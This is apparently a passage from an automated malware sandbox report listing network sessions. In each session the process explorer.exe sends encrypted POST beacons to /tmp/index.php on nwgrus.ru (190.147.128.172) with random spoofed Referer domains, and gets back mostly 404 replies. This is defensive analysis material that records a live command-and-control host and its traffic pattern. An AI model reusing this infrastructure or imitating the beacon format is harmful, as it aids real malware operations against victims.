                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 329
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:49.971894026 CEST329OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 44 31 ac ee
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuD19^LU>nv@V5>cc-f$W)[E-9&WhYBg:"a9*l_5y8ntp2Er[eX8
                                                          Oct 12, 2024 22:28:51.038444996 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:50 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449753190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:51.046792984 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bimvjobubxq.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 164
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:51.046792984 CEST164OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 56 1f c0 84
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuVdWAw^ !W_ncIZoK_AGl@YOWqF-&E
                                                          Oct 12, 2024 22:28:52.156235933 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:51 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449754190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:52.170543909 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rxrarkndhoucempk.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 329
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:52.170579910 CEST329OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 26 02 f3 b8
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu&VZR~\l-PDk)qx%e@d/C]y_HzipWk?#jXz_eb&/GS&u#SGD;}l`oJX/)
                                                          Oct 12, 2024 22:28:53.208653927 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.449755190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:53.219034910 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pkknpuucklp.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 341
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:53.219077110 CEST341OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 24 5d a0 ec
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu$]TEFnu>TXG$v M"kGH7},oQ"Z<<z)k9HZ4adK!DWfJ~Ba3y)B.W
                                                          Oct 12, 2024 22:28:54.279781103 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:54 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449756190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:54.295329094 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pegvelqjknxdu.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 195
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:54.295380116 CEST195OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 50 aa be
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu,PnIFqZq+q,1QyY+[?y1gpi?%#\HB)^!>0[_
                                                          Oct 12, 2024 22:28:55.387770891 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:55 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449757190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:55.401335001 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://cgelocrsuxurnrn.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 325
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:55.401361942 CEST325OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 77 41 e9 91
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuwAZ&c4|U%muK2@+A9&4!5D_Q]-2l*Mm3Z8 EJUWSU&b[}tc
                                                          Oct 12, 2024 22:28:56.467653990 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:56 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.449758190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:56.500699043 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xggjjjlvylvfsyxm.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 160
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:56.500699997 CEST160OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 77 2f aa f7
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuw/[UhSaMzfyj0*h42Yv.>+F}9)E
                                                          Oct 12, 2024 22:28:57.586148977 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.449760190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:57.594208956 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://dpiicsehdjnbnsmw.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 135
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:57.594225883 CEST135OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7e 4a e1 82
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu~JRBdw7e`,of~kfq?cK=
                                                          Oct 12, 2024 22:28:58.647370100 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:58 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.449767190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:58.654917002 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rustqqxkqobo.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 223
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:58.654952049 CEST223OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 2d 04 db ea
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu-[UbimswJfX&5nYU6oK"s37a.+OYp3!qy3dTT(zB3L",K^lWU
                                                          Oct 12, 2024 22:28:59.809421062 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:59 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.449773190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:59.821225882 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://fvvqfcjwkkyq.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 308
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:59.821257114 CEST308OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 57 0e b4 9c
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuWhEDAS#wo+=-zj|J7-W2G.?($w`(`aNB&xV;O8g +g;O|!B}zC
                                                          Oct 12, 2024 22:29:00.882107973 CEST189INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:00 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                          Data Ascii: #\6Y9l_m=rA


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.449790190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:02.376838923 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jskfymbttqm.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 247
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:02.376929045 CEST247OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 37 5e e1 91
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA ,[k,vu7^wWUbJ#I<8fEd^`B~H: Duj:$m]fE<Cs~:#=PG|.y=!Mv{@XL
                                                          Oct 12, 2024 22:29:03.439204931 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:03 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
